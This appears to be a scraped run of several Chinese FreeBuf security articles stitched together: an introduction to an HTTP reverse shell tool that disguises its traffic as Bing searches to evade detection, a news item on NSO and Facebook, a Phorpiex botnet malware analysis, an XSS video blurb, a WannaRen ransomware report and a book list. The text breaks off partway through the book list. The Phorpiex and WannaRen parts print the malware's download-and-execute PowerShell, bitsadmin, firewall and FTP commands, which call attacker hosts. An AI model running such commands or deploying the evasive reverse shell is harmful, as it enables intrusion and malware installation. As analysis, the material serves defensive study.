然而随着技术的发展,安全软件和硬件(入侵防御系统IPS、入侵检测系统IDS、代理、反病毒产品和EDR等)也变得越来越强壮,它们有能力去检测到这些攻击行为。而大多数情况下,与反向Shell的连接都是通过TCP或UDP隧道建立的。

因此,我们需要隐藏这些通信信道,而最好的方法就是将它们伪装成合法连接。标准用户使用最多的就是HTTP协议了,而且这种类型的流量几乎不会被过滤掉,以避免影响用户的网站浏览和访问。

工作机制

1、客户端App首先需要在目标设备上执行;

2、客户端与服务器建立初始连接;

3、服务器接受连接建立请求;

接下来:

客户端接收到指令之后,会向服务器发送查询请求;

攻击者提供指令给服务器端;

当命令被定义后,客户端将会执行该命令,并返回执行结果;

然后不断执行上述流程,直到攻击者结束会话连接为止。

功能介绍

该工具的当前版本实现了以下几种功能:

1、将HTTP流量伪造成bing.com的搜索流量;

2、命令会以Base64编码在HTML响应中;

3、命令执行结果会以Base64编码在客户端cookie中;

4、[可选]SSL支持,默认使用伪造的bing.com证书;

5、在每一个客户端调用请求之间设置随机延迟,以避免触发IDS;

6、服务器的每一个响应都使用了随机模板;

7、复用相同的PowerShell进程以避免触发EDR;

8、支持所有的CMD以及PowerShell命令;

9、[可选]客户端可以在启动时显示伪造的错误信息;

10、客户端在任务管理器中不可见;

11、[可选]客户端能以管理员身份运行;

反病毒产品检测

我们使用了69款反病毒产品来对我们的客户端来进行检测,其中只有三个会将其检测为恶意程序,而且还是在没有使用任何AV规避或混淆技术的情况下。

工具配置

客户端:C Sharp

1、在Visual Studio中打开HARS.sln文件。

Config.cs

这个文件中包含了工具的运行参数,我们需要根据具体情况来配置每个参数的值:

class Config

    {

        /* Behavior */

        // Display a fake error msg at startup

        public static bool DisplayErrorMsg = true;

        // Title of fake error msg

        public static string ErrorMsgTitle = "This application could not be started.";

        // Description of fake error msg

        public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";

        // Min delay between the client calls

        public static int MinDelay = 2;

        // Max delay between the client calls

        public static int MaxDelay = 5;

        // Fake uri requested - Warning : it must begin with "search" (or need a change on server side)

        public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";

        /* Listener */

        // Hostname/IP of C&C server

        public static string Server = "https://127.0.0.1";

        // Listening port of C&C server

        public static string Port = "443";

        // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy

        public static bool AllowInsecureCertificate = true;

}

HARS.manifest

按照下列命令修改相应参数,工具将默认以特殊权限运行:

<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

<requestedExecutionLevel level="asInvoker" uiAccess="false" />

<requestedExecutionLevel level="highestAvailable" uiAccess="false" />

项目属性

在下面这个界面中,你可以自定义配置编译信息以及文件图标:

注意:目标.NET框架版本设置为了v4.6,Windows 10默认自带了这个版本的框架。如果是Windows 7,你可以选择.NET v3.5。

代码构建

你需要在Visual Studio中构建项目源码,生成的客户端程序将存储在Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release目录下。

服务器端:Python

HARS_Server.py文件位于Http Asynchronous Reverse Shell\HARS_Server\www目录下。如果你需要修改端口或证书位置,可以直接修改配置文件中的相应参数:

# Config

PORT = 443

CERT_FILE = '../server.pem'

工具运行

python HARS_Server.py

其他配置

1、HTTP日志文件存储在Http Asynchronous Reverse Shell\HARS_Server\logs目录下。

2、你可以在Http Asynchronous Reverse Shell\HARS_Server\templates目录下添加你自己的模板(任意HTML页面文件)。

工具演示

客户端

服务器端

声明

此工具仅用作授权安全测试的概念验证演示工具,请不要将其用于恶意目的。

项目地址

Http-Asynchronous-Reverse-Shell:【GitHub传送门

* 参考来源:onSec-fr,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

去年,Facebook旗下的WhatsApp控告以色列间谍软件公司NSO协助多个国家入侵用户手机。

目前,官司还在诉讼中,但是NSO却在提交的特别法庭文件中提及——Facebook曾试图向NSO 购买间谍工具,用来监视部分用户。

???

这波被告转原告的既视感是怎么回事?Facebook直接变“贼喊捉贼”了?不过,面对NSO的陈述,Facebook表示:没有这回事,这是NSO意图转移焦点。

facebook-research-vpn-project-atlas.jpg

图片来源:Bryce Durbin / TechCrunch

NSO和Facebook的官司

NSO秘密运营了很多年,直到2016年,Citizenlab组织和Lookout公司的研究人员发现NSO的软件针对阿联酋人权捍卫者Ahmed Mansoor的攻击。NSO才正式进入大众的视野。与监视领域的许多其他以色列初创公司一样,NSO于2010年由军队首要信号情报部门的三名老兵创立,成立后立即开始研究间谍技术/产品。

和Facebook的这场官司,发生在2019年10月。

当时,Facebook旗下的WhatsApp起诉NSO,指控其利用WhatsApp消息传递服务中的漏洞(CVE-2019-3568),通过调用目标设备在手机上远程安装间谍软件,对全世界100多名记者和维权人士进行恶意活动。有趣的是,在Facebook起诉NSO后的一个月,NSO的一群员工反过来起诉Facebook,原因是他们的Facebook被不公平地删除了。

可以说,这两家公司在互相起诉、围绕间谍软件方面引发了很多争议。但是,最近因为NSO的“爆料”,Facebook似乎落于下风。

NSO曝出“陈年秘密”?

在NSO提交的特别法庭文件中是这么说的:

2017年10月,Facebook代表主动联系了他们,试图购买了一种可以帮助社交网络巨头更好监视用户的工具Pegasus,它可以从智能手机中窃取任何类型的数据,并通过相机和麦克风来监视周围的环境。

并且,Facebook有兴趣对已经安装了Onavo(Facebook开发的一款VPN产品,2019年被关闭)的用户的移动设备进行有效监控。但因为担心通过Onavo收集用户数据的方法在Apple设备上的效果不如在Android设备上。因此他们希望使用Pegasus的功能来专门监视Apple设备上的用户,并愿意为监视付费。

我们还找到了The New York Times的报道,“据一份商业计划书显示,监视10个iPhone或安卓用户,NSO Group分别向政府机构收取65万美元;5名黑莓用户收取50万美元;5名塞班用户收取30万美元——安装费另算。你可以监视更多目标。NSO Group的商业计划书显示,外加100个目标将收取80万美元,外加50个目标50万美元,外加20个目标25万美元,外加10个15万美元。年系统维护费用为之后每年总价的17%。”

[嗯,数据真的是高价值的“产品”。]

不过,由于NSO的主要客户是情报机构,执法部门和军方。Facebook作为一个私企,并不在NSO的客户标准范围内,所以据说最后这些监视服务并没有提供给Facebook。

目前的这些消息暂时没有证据可以佐证,但6个月多以来,Facebook和NSO在纷争中不断曝出细节,的的确确引发了我们对安全的担忧。

最后,谁会赢?Facebook还是NSO ?

我不知道,但是可以确定的是,失败者是什么都不知道的用户。

*参考来源:securityaffairs,kirazhou编译整理,转载请注明来自 FreeBuf.COM。

Phorpiex僵尸网络中有超过1,000,000台被感染的Windows计算机。 在以前的文章中写了关于僵尸网络体系结构,其命令和控制基础架构以及货币化方法的文章:《Phorpiex Breakdown》,《In the Footsteps of a Sextortion Campaign》,在本文中会对该僵尸网络的恶意模块的技术细节进行分析。

综述

Phorpiex僵尸网络的核心部分是一个名为Tldr的加载程序。 它负责将其他恶意模块和其他恶意软件加载到受感染的计算机。 每个模块都是单独的Windows可执行文件。 通常Phorpiex模块非常小而简单。 恶意软件配置(通常包括C&C服务器地址,加密货币钱包和恶意有效负载的URL)被硬编码在恶意软件可执行文件中。 如果需要更新配置,僵尸网络只需将新模块加载到受感染的计算机即可。 这些模块会经常进行更新,进行细微的更改。 2019年期间发现了以下类型的模块:

Loader Phorpiex Tldr.

VNC Worm Module.

NetBIOS Worm Module.

XMRig Silent Miner.

Spam Module: Self-spreading and Sextortion

Auxiliary modules (小型目标定位和痕迹清理模块).

这些模块中的3个(Tldr,VNC蠕虫和NetBIOS蠕虫)具有自行传播功能。 例如,Tldr具有感染病毒功能,能够感染其他文件。 VNC蠕虫使用弱密码连接到VNC服务器,并尝试通过模拟用户输入来进行感染。第一部分中详细分析其中两个模块:Loader Phorpiex Tldr,VNC Worm Module.

Phorpiex Tldr

Tldr(“ TrikLoader”)是Phorpiex僵尸网络基础结构的关键部分之一。

首次发现该恶意软件时,无法识别它或分析与其它僵尸网络的联系。 但是从它的二进制代码,mutex名称和逃避沙箱检测等技术可以看出,此恶意软件和Phorpiex Trik IRC bot是由同一批网络犯罪分子开发的,在Trik和Tldr C&C服务器之间还发现了几个交叉点。

目前存在大量的Phorpiex Tldr版本,每个版本具有不同的功能。分析的重点是它们共有的功能,特别是最新版本(自2019年7月起)中添加的新功能。Tldr恶意软件的主要目的是向受感染的计算机下载并执行其他模块和恶意软件。 Tldr还具有自我传播的能力,它类似于蠕虫或文件病毒,可感染其他软件。

规避技术

Phorpiex Tldr使用简单的沙盒规避技术。 启动后,它将调用GetModuleHandle API函数以检查进程中是否加载了以下模块之一:

SBIEDLL.DLL

SBIEDLLX.DLL

WPESPY.DLL

DIR_WATCH.DLL

API_LOG.DLL

DIR_WATCH.DLL

PSTOREC.DLL

然后,它枚举正在运行的进程并检查进程文件名是否为以下之一:

VBOXSERVICE.EXE

VBOXTRAY.EXE

VMTOOLSD.EXE

VMWARETRAY.EXE

VMWAREUSER

VMSRVC.EXE

VMUSRVC.EXE

PRL_TOOLS.EXE

XENSERVICE.EXE

较旧版本的Tldr(TldrV3,2018年5月)也会检查这些进程:然后枚举正在运行的进程并检查进程名是否以下之一:

python.exe

pythonw.exe

prl_cc.exe

vboxservice.exe

vboxcontrol.exe

tpautoconnsvc.exe

最后,Tldr调用IsDebuggerPresent API函数检查是否正在调试恶意软件。如果一项检查没有通过,Tldr会停止执行。

初始化

初始化步骤与Phorpiex Trik的初始化步骤非常相似。为了防止运行多个Phorpiex Tldr,它将创建一个具有特定硬编码名称的互斥。较早版本使用版本号的互斥锁名称,例如“ TldrV3”。 在最新版本中,每个系列的互斥体名称不同。 通常由几位数字组成,例如:“ 6486894”。

下一步所有Phorpiex样本都是相同的:删除“:Zone.Identifier”替代数据流。 执行此操作是为了消除文件源是不受信任源的问题。自2019年7月起的版本(Tldr v5.0)拥有Debug特权:

持久化

Tldr将自身复制到以下文件夹:

%windir%

%userprofile%

%systemdrive% (only version from July 2019)

%temp%

对于Phorpiex Tldr V3,选择路径和文件名与Phorpiex Trik相同。 Tldr在这些路径下创建一个带有以“ T-”开头(在Phorpiex Trik中,名称以“ M-”开头)的子文件夹。 然后,恶意软件将其可执行文件复制到文件夹中。 例如:

C:\WINDOWS\T-9759504507674060850740\winsvc.exe

与Phorpiex Tldr v3不同,较新的版本仅在文件名不包含“ sys”子字符串的情况下才会进行创建复制。 它使用随机数字生成的子文件夹名称和以“ sys”开头加4个随机字母的文件名:

C:\WINDOWS\2813528135\sysjekp.exe

Phorpiex Tldr为创建的文件和子文件夹设置属性FILE_ATTRIBUTE_READONLY,FILE_ATTRIBUTE_HIDDEN,FILE_ATTRIBUTE_SYSTEM。然后设置注册表自动运行:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

Tldr使用硬编码创建新的注册表值。研究样本中名称为“ Windows Operating System”:

它通过注册表项添加防火墙规则:

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\

绕过windows安防措施

2019年7月以来的Phorpiex Tldr版本(Tldr v5)通过设置以下注册表值来禁用Windows安全功能,例如Windows Defender,安全通知和系统还原:

主要功能

每个恶意活动Phorpiex Tldr都会创建一个单独的线程。

Crypto Clipper

所有样本都包含用于窃取加密货币的功能,通过更改受感染系统剪贴板中的加密货币钱包的地址实现。恶意软件每200毫秒调用API函数OpenClipboard和GetClipboardData查询剪贴板数据。为了确定剪贴板中是否包含加密钱包地址,Phorpiex Tldr进行了以下检查:

1、首字母是否是:1, 3, q, 2, X, D, 0, L, 4, P, t, z, G, U, E;

2、长度在25到45个字符或是9个字母,或90至115个字母;

3、不包含O (0x4F), I (0×49), l (0x6C);

4、只含有数字和字母;

任何一项检查失败,剪贴板保持不变。 否则,它将进一步确定加密货币钱包地址类型,将其更改为硬编码值之一。 Phorpiex Tldr通过剪贴板数据的第一个字符确定类型:

支持的加密货币类型包括:

Bitcoin

Bitcoin Cash

Ethereum

DASH

Dogecoin

Litecoin

Monero

Zcash

Crypto Clipper还处理Perfect Money钱包(金,美元,欧元):

Self-spreading

该线程中实现了文件蠕虫功能。在无限循环中,Tldr使用GetLogicalDrives枚举可用的驱动器。读取“ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”注册表项值“ NoDrives”,从枚举中排除NoDrives Windows资源管理器策略禁用的驱动器,选择可移动和远程驱动器。在每个选定的驱动器上,将创建一个名为“ __”的文件夹,并将属性设置为FILE_ATTRIBUTE_READONLY,FILE_ATTRIBUTE_HIDDEN和FILE_ATRRIBUTE_SYSTEM,使其在资源管理器中不可见。

恶意软件会使用硬编码名称(示例中为“ DriveMgr.exe”)将自身复制到此文件夹中。 Tldr获取所选驱动器的卷名称。然后在所选驱动器的根文件夹中创建一个名为“ {volume_name} .lnk”的快捷方式:

%windir%\system32\cmd.exe /c start __ & __\DriveMgr.exe & exit

然后Tldr将所有文件夹从所选驱动器的根路径移至文件夹“ __”。它还会删除根路径中具有以下扩展名的所有文件:

*.lnk, *.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd,*.pif, *.jar, *.dll, *.vbe, *.inf”

这样做的原因可能是禁用在同一驱动器上的所有其他蠕虫。在Tldr v5.0中引入了一项新功能,允许恶意软件充感染其他可执行文件。此前,Phorpiex使用单独的模块来感染其他软件。恶意软件会扫描可移动和远程驱动器上的所有文件夹,并感染所有尚未感染的.exe文件。

为了感染PE文件,Tldr执行以下修改:增加PE文件头中节的数量,并将头的TimeDateStamp值设置为0x0000DEAD:

恶意软件还使用TimeDateStamp中的值来检测文件是否已被感染。 值0x0000DEAD转换为时间戳1970-01-01 15:50:05。使用以下查询可以在VirusTotal上轻松找到被感染的样本:

pets:1970-01-01T15:50:05

Tldr还会创建一个名为“ .zero”的新代码段,将恶意负载复制到该段。 修改入口点地址指向所创建节的开头。该恶意软件不会重新计算校验和,只是重置为0。

恶意软件在主代码中写入其相对地址:

使用值0xCCCCCCCC在模板函数中找到原始入口点:

Shellcode

插入受感染文件中的shellcode由几个功能组成。 不使用绝对地址,放置在任何内存位置时都能够正确运行。

首先,shellcode检查文件“%appdata%\ winsvcs.txt”是否存在。如果该文件存在,shellcode不会执行任何操作,只将控制权传递给感染程序的原始入口点;文件存在,则将从硬编码的URL下载并执行另一个文件:

使用URLDownloadToFileW将文件下载到临时文件。 使用函数GetTempPathW和GetTempFileNameW获得临时文件的名称。 如果文件下载成功,shellcode将从该文件中删除“:Zone.Identifier” ADS,并使用CreateProcessW执行该文件。

C&C检查

首次运行时,Phorpiex Tldr使用C&C服务器的硬编码列表对其C&C服务器发出HTTP请求:

Tldr为每个C&C服务器创建一个线程。 在启动线程之前,恶意软件会创建一个空文件“%appdata%\ winsvcs.txt”。 该文件用作确定恶意软件是否首次运行的标志。 如果该文件已经存在,则不会创建线程。

在每个线程中,恶意软件都会查询以下URL:

http://<cnc_host>/t.php?new=1

在其他样本中还看到了不同格式的URL,例如:

http://<cnc_host>/tldr.php?new=1

http://<cnc_host>/tldr.php?on=1

http://<cnc_host>/tldr.php?new=1&id=<random_number>

http://<cnc_host>/tldr.php?new=1&on=<random_number>

为了执行请求,Phorpiex Tldr对用户请求头使用特定的硬编码值。2019年7月开始的值是:

Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv:67.0)Gecko / 20100101 Firefox / 67.0

较旧版本的值:

Mozilla / 5.0(Macintosh; Intel Mac OS X 10.9; rv:25.0)Gecko / 20100101 Firefox / 25.0

生成的HTTP请求如下所示:

主线程

Phorpiex Tldr主要目的是在受感染的主机上下载并执行其他恶意负载。它使用硬编码的路径(通常4到8个)来创建用于下载文件的URL:

http://<cnc_domain>/1.exe

http://<cnc_ domain>/2.exe

每个生成的URL,恶意软件首先使用InternetOpenUrlA和HttpQueryInfoA检查其可用性和大小。 如果URL可用,则Tldr会记住每个路径的大小。 如果大小与先前的值相同,则将跳过URL,防止重新下载。如果URL可用或者内容长度与先前的值不同,Tldr将下载并执行它。下载的文件保存在%temp%文件夹下,名称为:

“%d.exe” % random.randint(10000, 40000)

Tldr会有两次下载文件的尝试:使用InternetOpenUrlW / InternetReadFile;如果第一次失败,则使用URLDownloadToFileW。下载文件后,Porpiex Tldr删除“:Zone.Identifier”。然后使用CreateProcess两次执行下载的文件,如果第一次失败,则使用ShellExecute。

最新的Tldr版本(v5)有了重大改进,使用带有R**和RSA-SHA1签名验证的文件。加密文件头包含魔术字节(“ NGS!”),RSA签名的长度以及用于验证文件的RSA签名。 RSA签名的前16个字节用作R**解密密钥:

Phorpiex Tldr使用文件中的16字节R**密钥解密数据,然后计算解密文件的SHA1哈希。 为了验证数字签名,Tldr使用硬编码到样本中的4096位RSA公钥。

VNC Worm 模块

在Phorpiex中发现的模块之一是恶意VNC客户端。它没有自己的持久性机制,每次都会由Tldr执行。恶意软件会扫描随机IP地址查找开放的VNC服务器端口(5900),使用硬编码的列表进行暴力攻击。 最终目标是在目标主机上加载并执行另一个恶意软件(通常是Phorpiex Tldr)。

Phorpiex VNC蠕虫执行一开始就利用API bombing技术规避沙盒。 它在循环中执行多个函数的大量无意义的调用:

使用硬编码名称的互斥锁来防止多次执行:

攻击本身是无限循环的。使用rand函数随机生成用于扫描的IP地址,将GetTickCount作为随机种子。 IP地址的唯一过滤规则是它不能以127、172或192开头。如果成功连接到TCP端口5900,VNC蠕虫会使用密码列表对发现的VNC服务器发起暴力攻击:

密码列表在不同样本中可能有所不同。如果攻击成功,使用以下格式的URL将结果报告给C&C服务器:

hxxp://92.63.197.153/result.php?vnc=%s|%s” % (host, password)

最后,Phorpiex VNC通过使用VNC协议模拟键盘输入,在受害者的计算机上执行多个脚本。

执行以下操作:

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(‘http://92.63.197.153/vnc.exe’,’%temp%\48303045850.exe’);Start-Process ‘%temp%\48303045850.exe’

cmd.exe /c bitsadmin /transfer getitman /download /priority highhttp://92.63.197.153/vnc.exe%temp%\49405003030.exe&start %temp%\49405003030.exe

cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe “ok” ENABLE&netsh advfirewall firewall add rule name=”ok” dir=in action=allow program=”C:\Windows\System32\ftp.exe” enable=yes

cmd.exe /c “cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get vnc.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start vnc.exe”

Phorpiex VNC蠕虫会使受害者的计算机通过HTTP或FTP从服务器上下载并执行恶意脚本:

ftp://tom:[email protected][.]153/vnc.exe

ftp://tom:[email protected][.]153/ohuh.exe

http://92.63.197[.]153/vnc.exe

http://92.63.197[.]153/ohuh.exe

IOC

Phorpiex Tldr

Phorpiex Tldr C&C IP和域

185.176.27.132

193.32.161.69

193.32.161.73

193.32.161.77

92.63.197.153

92.63.197.38

92.63.197.59

92.63.197.60

94.156.133.65

aiiaiafrzrueuedur.ru

fafhoafouehfuh.su

ffoeefsheuesihfo.ru

osheoufhusheoghuesd.ru

ouhfuosuoosrhzfzr.ru

slpsrgpsrhojifdij.ru

unokaoeojoejfghr.ru

b0t.to

thaus.to

thaus.top

Phorpiex Tldr相关url

hxxp://185.176.27[.]132/a.exe

hxxp://aiiaiafrzrueuedur.ru/o.exe

hxxp://185.176.27[.]132/1

hxxp://185.176.27[.]132/2

hxxp://185.176.27[.]132/3

hxxp://185.176.27[.]132/4

hxxp://185.176.27[.]132/5

hxxp://185.176.27[.]132/6

hxxp://185.176.27[.]132/7

hxxp://193.32.161[.]69/1.exe

hxxp://193.32.161[.]69/2.exe

hxxp://193.32.161[.]69/3.exe

hxxp://193.32.161[.]69/4.exe

hxxp://193.32.161[.]69/5.exe

hxxp://193.32.161[.]69/6.exe

hxxp://193.32.161[.]69/7.exe

hxxp://193.32.161[.]69/ya.exe

hxxp://193.32.161[.]73/1

hxxp://193.32.161[.]73/2

hxxp://193.32.161[.]73/3

hxxp://193.32.161[.]73/4

hxxp://193.32.161[.]73/5

hxxp://193.32.161[.]73/6

hxxp://193.32.161[.]73/s.exe

hxxp://193.32.161[.]77/11.exe

Phorpiex VNC Worm

*参考来源:checkpoint,由Kriston编译,转载请注明来自FreeBuf.COM

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

内容介绍

XSS(跨站脚本攻击)是Web应用程序中最常见的漏洞之一,指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

本期视频为大家介绍什么是XSS漏洞、XSS漏洞有哪些分类、以及如何防范XSS漏洞等问题。最后为了大家能更好的理解XSS漏洞,还为大家提供各种XSS漏洞游戏,一起来挑战吧!

XSS漏洞挑战游戏

观看视频

*本课程翻译自Youtube精选系列教程,喜欢的点一波关注(每周更新)!

*本文作者:willhuang,字幕翻译:高佳,FreeBuf视频组荣誉出品,转载须注明来自FreeBuf.COM

近日,有网友在社交媒体公开求助,称感染了一款名为WannaRen的新型勒索软件,部分文件被加密,需要支付0.05个比特币(约合2500元)。

部分截图如下:

WannaRen解密器图标伪装Everything。

奇安信病毒响应中心在发现该情况后,第一时间发布了关于该WannaRen的样本解密器分析报告。

WannaRen勒索软件事件分析报告

https://mp.weixin.qq.com/s/pWB1Ex2X6AcSSMIswLizXg

勒索软件的样本解密器截图:

为了进一步补充攻击视角,奇安信威胁情报中心红雨滴团队详细分析事件后,将更多关于该勒索攻击的检测维度公布。

攻击事件分析

根据线索,我们发现于4月2号天擎用户的拦截日志显示

powershell.exe -ep bypass -e

SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0A**AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwA**AYwBvAG0AJwApACkA

通过解码发现powershell会去下载并执行cs.sslsngyl90.com的脚本。

实际上该域名会重定向至如下链接。

http://cpu.sslsngyl90.com/vip.txt

从Vip.txt中的脚本可见攻击者会从vim-cn.com图床上下载WINWORD.EXE和wwlib.dll,这种是典型的白加黑攻击手段。通过执行WINWORD.EXE即可加载于同一目录的wwlib.dll。

紧接着wwlib.dll会去加载Public\目录下的you程序,有趣的是,fm文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。

该程序需要会使用busahk87909we对you进行解密,解密后在内存加载WannaRen勒索软件

之后的事,跟开头的感染后的症状一致了。

除了上面的勒索情况外,Powershell下载器还具有挖矿功能,其下载后会重命名为nb.exe,其意指中文的**

有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。

我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。

然而目前事情居然上了微博热搜,而且阅读量高达1.1亿,只能说当年的WannaCry余威仍在不断散发,攻击者这次是不好跑了。

横向移动功能

从Powershell下载器中可以看到,攻击者会通过图床链接去下载永恒之蓝传播模块。

而office.exe实际上是自解压文件。

此外,该脚本还有一种很少见的横向移动辅助手法,该手法利用了Everything拥有的http服务器功能。

首先,其会在受害器上下载aaaa.exe,并保存到C:\Users\Public\目录下,功能为释放everything并开启http服务器功能,这样在同一内网的其他受害者就可以通过该http服务器下载上面的恶意程序,从而进一步的扩散受害面。

关联分析

通过攻击者的域名,我们发现sslsngyl90.com在1月份奇安信威胁情报中心与就已经将该域名与HideShadowMiner组织的攻击关联在一起,并将域名置黑,因此部署相关情报产品的用户均无遭受此威胁。

HideShadowMiner,国内统称为匿影组织,该组织此前一直进行挖矿攻击,此前国内友商就曾发布过该组织的攻击报告:

http://www.ijinshan.com/info/202003201525.shtml

此外,我们通过特征,发现匿影组织还使用了多个域名搭载同一套Powershell攻击框架发起攻击。

http://us.howappyoude.club/v.txt

http://cpu.goolecpuclan.xyz/vip.txt

相关攻击域名在全网的访问趋势图,时间集中在近期,符合事件发生时段。

除了上面的线索外,还需要注意的是,攻击者会通过微当下载去下载APK程序,并重命名为exe文件,但这也意味着,微当下载并没有识别出该APK是恶意的PE程序并进行了放行,这对于攻击者来说是一个非常好利用的资源。

微当下载的软件提交方式

总结

万幸的是,虽说整个攻击过程都被奇安信分析人员解析清楚,但是由于在2020年4月2奇安信天擎就已经检测并执行Powershell攻击的行为,因此奇安信的用户无一中招。

此外,退一万步说,即使Powershell执行起来了,但是对应的勒索病毒模块同样被天擎查杀。

奇安信红雨滴团队提醒广大用户,及时备份重要文件,更新安装补丁,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。

我们提供了IOC,以供用户自查。

IOC

cpu.sslsngyl90.com/xx.txt

cpu.sslsngyl90.com/wmi.txt

us.howappyoude.club/v.txt

cpu.goolecpuclan.xyz/vip.txt

xx.sslsngyl90.com

xx.sslsngyl90.com

wmi.sslsngyl90.com

wmi.sslsngyl90.com

d.sslsngyl90.com

cs.sslsngyl90.com

cpu.sslsngyl90.com

sslsngyl90.com

相关恶意程序下发路径

C:\ProgramData\227.exe

C:\ProgramData\office.exe

C:\ProgramData\nb.exe

C:\ProgramData\WinRing0x64.sys

C:\ProgramData\officekms.exe

C:\ProgramData\xeexfrt.txt

C:\Users\Public\MicrosftEdgeCP.exe

C:\Users\Public\1\winlogtrf.exe

C:\ProgramData\227.txt

C:\Users\Public\ aaaa.exe

C:\Users\Public\you

C:\ProgramData\wwlib.dll

WannaRen勒索软件主体Hash

9854723bf668c0303a966f2c282f72ea

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

AdobeStock_290246299.jpeg

如果您近期感到十分不安和惶恐,那么请相信您不是一个人!为了阻止新型冠状病毒(COVID-19)的进一步传播,世界各地的人们都开始隔离状态,“享受”足不出户就能为国家做贡献的“高光时刻”,不过,这也就意味着我们所有人都急需一些方法来消磨这段“超长待机”的假期时光。

无疑,新型冠状病毒改变了网络安全从业人员的生活和工作方式。企业必须实施业务连续性计划,并鼓励员工在家办公,即便以前他们并不支持这种行为。为了保护员工的身体健康而进行的一个转变,在迫使每个人都习惯新的常态的同时,也进一步扩大了攻击面。

随着新冠病毒危机的持续蔓延,战斗在一线的医护人员并不是唯一忙碌的人。最近几周,随着攻击者开始利用此次病毒危机大做文章,安全研究人员发现,与新冠病毒相关的恶意活动变得越来越多。对于所有行业(尤其是执法和医疗保健行业)的企业而言,其面临的网络攻击风险正在逐渐递增,因为攻击者部署了以病毒为主题的网络钓鱼邮件,来诱骗用户点击恶意附件,实施网络钓鱼活动。

在这样一个关键时期,阅读一本好书有助于我们放松紧绷的神经。接下来,我们将为大家介绍几本最新出版的信息安全类书籍,并发表一些书评,希望能够有您感兴趣的主题,来帮助您打发这段漫长的时光。

1. 《沙虫:网络战争的新时代与对克里姆林宫最危险黑客的追捕》(Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers)

——作者:安迪·格林伯格(Andy Greenberg)

Sandworm.jpg

在《沙虫》一书中,《连线(Wired)》杂志的资深作家安迪·格林伯格讲述了一个真实的故事:他不顾一切地寻找并追踪一支致力于数字破坏的俄罗斯特工精英团队。

2014年,世界见证了一系列神秘网络攻击的开始。针对美国公用事业公司、北约和东欧电网,网络攻击愈演愈烈,包括首次由黑客引发的停电事件。这些攻击在2017年夏天达到高潮,当时被称为“NotPetya”的恶意软件被释放、渗透、破坏并瘫痪了一些世界上最大的公司——从制药厂到软件开发商再到航运公司。

在对乌克兰的攻击中,自动取款机被冻结了;铁路和邮政系统关闭;医院里一片漆黑。NotPetya在世界各地蔓延,造成了前所未有的100亿美元的损失,这是世界上最大、最具破坏性的网络攻击。这些攻击背后的黑客很快就获得了史上最危险网络战士的名声——Sandwork。

他们为俄罗斯军事情报局服务,代表着一支持久的、高技能的、由国家资助的部队,他们对敌人最关键的基础设施发动广泛、无限制的攻击。他们的目标是政府和私营部门、军人和平民。这是一个令人毛骨悚然的、遍及全球的侦探故事,沙虫认为这股力量对我们国家的稳定和安全构成了危险。

随着克里姆林宫在2016年选举中的干预、操纵外国政府和引发混乱中的作用越来越受到关注,沙虫不仅暴露了俄罗斯全球数字攻击的现实,而且暴露了一个战争不再在战场上进行的时代。它揭示了数字和物理实体之间的冲突,战争与和平时期之间的界限早已经开始模糊——这是一个令人震惊的含义。

2. 《2020年安全年鉴:IT安全行业的历史和目录》(Security Yearbook 2020: A History and Directory of the IT Security Industry)

——作者:理查德·斯蒂安农(Richard Stiennon)

 SecurityYearbook.jpg

那些希望全面了解网络安全行业的人士可以在Richard Stiennon的《2020年安全年鉴》中找到答案,其中详细介绍了构成该行业复杂历史的人员、组织和关键事件。

读者可以通过此书追溯Symantec、Check Point Software、BorderWare、Network Associates以及当今其他主流网络安全厂商早期的发展历程。除了一些著名安全厂商外,作者Stiennon还讲述了安全领域一些关键人物的故事,包括Check Point创始人兼首席执行官Gil Shwed、前微软和赛门铁克高管Ron Moritz、Verisign创始人兼Bessemer合伙人David Cowan,以及其他成千上万个行业先驱者。

Stiennon的目录按字母、国家以及具体类别列出了所有供应商信息。他的《2020年安全年鉴》是安全专业人员、研究人员、学生以及其他任何有兴趣进一步了解这个快速发展的行业的人士的便捷参考资料。

3. 《零日倒计时:Stuxnet和世界上第一个数字武器的发布》(Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon)

——作者:金·泽特(Kim Zetter)

 KS-CountdowntoZeroDay.jpg

